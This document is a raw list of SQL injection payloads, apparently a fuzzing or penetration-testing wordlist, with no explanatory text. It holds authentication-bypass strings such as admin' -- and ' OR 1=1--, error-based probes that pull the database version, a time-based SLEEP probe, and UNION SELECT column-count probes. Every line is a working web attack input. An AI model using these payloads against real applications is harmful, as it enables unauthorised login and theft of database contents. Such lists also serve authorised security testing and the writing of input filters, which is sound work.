admin' #
admin' --
admin'#
admin'--
admin'/*
admin' or '1'='1
admin' OR '1'='1
admin' OR '1'='1' --
admin' OR 1=1#
admin' OR 1=1--
admin' OR 1=1 LIMIT 1--
" AND "1"="1
' AND '1'='1
' AND '1'='2
' AND 1=2--
' AND 1=CAST((SELECT @@version) AS int)--
' AND 1=CONVERT(int, (SELECT @@version))--
' AND 1=(SELECT COUNT(*) FROM information_schema.tables)--
" AND "a"="a
' AND 'a'='a
' AND EXTRACTVALUE(1, CONCAT(0x5c, (SELECT version())))--
' AND (SELECT * FROM (SELECT(SLEEP(0)))a)--
' or 1=1#
' or 1=1--
' or 1=1/*
') or '1'='1--
') or ('1'='1--
' OR '1'='1
' OR 1=1 -- 
' OR 1=1#
' OR 1=1--
' OR 1=1-- -
' OR 1=1/*
') OR '1'='1'--
') OR ('1'='1
'OR 1=1#
'OR 1=1--
'OR 1=1/*
' or 1=1 limit 1 -- -+
' OR '1'='2
' OR 'a'='a
' OR 'x'='x
' UNION ALL SELECT NULL--
' UNION ALL SELECT NULL,NULL--
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
